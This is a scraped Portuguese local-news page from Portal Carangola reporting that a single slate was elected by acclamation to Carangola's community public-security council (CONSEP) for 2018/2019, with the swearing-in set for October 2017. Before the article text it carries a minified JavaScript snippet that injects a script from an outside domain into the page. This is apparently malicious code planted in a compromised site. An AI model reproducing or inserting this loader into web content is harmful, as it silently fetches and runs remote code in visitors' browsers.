;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Eleição do CONSEP biênio 2018/2019. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Eleição do CONSEP biênio 2018/2019.

O CONSEP – Conselho Comunitário de Segurança Pública é o espaço de exercício da cidadania consciente, onde cidadãos de uma comunidade, através de reuniões, participam e discutem problemas locais da segurança pública, adotam medidas práticas que resultem na melhoria de qualidade de vida das comunidades.

         Em Carangola, o CONSEP foi fundado em 29/11/2006, e no dia 15/09/2017, após o término do mandato do biênio 2016/2017, foi realizada uma reunião na sede da ACIAC com a presença dos membros do Conselho e Assembléia Geral, presidida pelo Presidente Sr. Pedro Paulo Drumond.

   Na reunião, a única chapa apresentada para o CONSEP Biênio 208/2019 foi eleita por aclamação.

         Sendo assim, no dia 02 de outubro de 2017, ocorrerá a posse dos novos membros do CONSEP na sede da Câmara Municipal de Vereadores, situada à Rua Marechal Floriano Peixoto, nº 78, Bairro Centro, Carangola/MG.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.